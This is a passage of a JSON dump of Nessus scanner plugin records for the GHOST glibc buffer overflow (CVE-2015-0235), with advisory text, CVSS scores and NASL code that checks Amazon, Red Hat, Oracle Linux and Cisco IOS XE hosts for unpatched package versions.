value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\n# Checks for below glibc-2.17\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.17-0.0.amzn1\"))\n{\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.149.49.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.149.49.amzn1\")) flag++;\n}\nelse\n{\n # Checks for glibc-2.17\n # Clean out initial report from first check\n __rpm_report = '';\n if (rpm_check(release:\"ALA\", reference:\"glibc-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-static-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.17-55.93.amzn1\")) flag++;\n if (rpm_check(release:\"ALA\", reference:\"nscd-2.17-55.93.amzn1\")) flag++;\n}\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:29", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "RHEL 5 : glibc (RHSA-2015:0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81033", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81033);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0090\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:39", "description": "The remote Cisco device is running a version of Cisco IOS XE software that is potentially affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that this issue only affects those IOS XE instances that are running as a 'Nova' device, and thus, if the remote IOS XE instance is not running as a 'Nova' device, consider this a false positive.", "cvss3": {}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XE GNU GNU C Library (glibc) Buffer Overflow (CSCus69731) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20150128-GHOST-IOSXE_NOVA.NASL", "href": "https://www.tenable.com/plugins/nessus/81595", "sourceData": "#TRUSTED 70ddb6fe0d8dbc7ccaf382570f0f476d58fc99b615c444c83fb7bf51899e7714303756300409a77fbd8bd0ff36774383ecd3751628bc4ed03d7337a4e6d0034adbd1ae03e28a8eb5f737c813b05702889b5d7a64fffee4ad39c71e0a47c9354c2150ef6f089df7712e51f3b724a4bdd66332bdd7234e479a0dc98cffc3f74137a6b80be4cd00f5a4a3c0667691bd0185881b902d85912243bc9c4e7d48aeb6cf8b4fd79e7d087d2b16a1e1192b0ff922689021fb0431b1b33aefb452cd5555f424328105481ff422b0183ac870cbd8a5050ea3ce13749849d5d7d3adcd3be86e705182abf147b35679ee304a817dd50de295f4c5a375fbf7a47df6dffeb42debea8f7e74ac82e35b9fd000fa8d3a09f097afad89d1d457e665aa50bfc88be38faf61e78802427d610616dea79ab04b76a97a1e2759af0a0584ce16df3b073e87b3996645c1478ef9851ec17b739e2583d04afc4529eaf7dc48e095aa790b9c2833146f7ef1d4e95ba795944dce1ac9cb2b992063288dcc41c16889c66b8a5cf3ac9cc5572a3b9c66631f95bfc1eadb5dd5bfa92914cdc3fd0f2cb181bad342f7e83e758da4884dd5091309c77a56bd79f2d87d5936b5c703b241219394b4003b4873f8657c366f30ca5eda4b3faa75dbdea0d3be7667f0bd8139dd221fff4b8e7d90efbe30a433799c0c1fdcc687deab476fd1040626779547e72a98f337edff\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81595);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69731\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XE GNU GNU C Library (glibc) Buffer Overflow (CSCus69731) (GHOST)\");\n script_summary(english:\"Checks IOS XE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XE software\nthat is potentially affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidated user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\n\nNote that this issue only affects those IOS XE instances that are\nrunning as a 'Nova' device, and thus, if the remote IOS XE instance\nis not running as a 'Nova' device, consider this a false positive.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69731\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69731.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\n# Bug notes these are affected on 'Nova' devices\n# only.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\n\n# Per Bug CSCus69731 (converted from IOS vers)\n# No model restrictions listed\n# Further note that IOS version '15.0(2)EX'\n# is not mapped and thus, omitted.\nif (\n version == \"3.1.0SG\" ||\n version == \"3.2.0SE\" ||\n version == \"3.2.0SG\" ||\n version == \"3.2.0XO\" ||\n version == \"3.3.0SE\" ||\n version == \"3.3.0XO\" ||\n version == \"3.4.0SG\" ||\n version == \"3.5.0E\" ||\n version == \"3.6.0E\" ||\n version == \"3.7.0E\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69731' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:50", "description": "From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81044", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# Oracle Linux Security Advisory ELSA-2015-0090 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81044);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004811.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 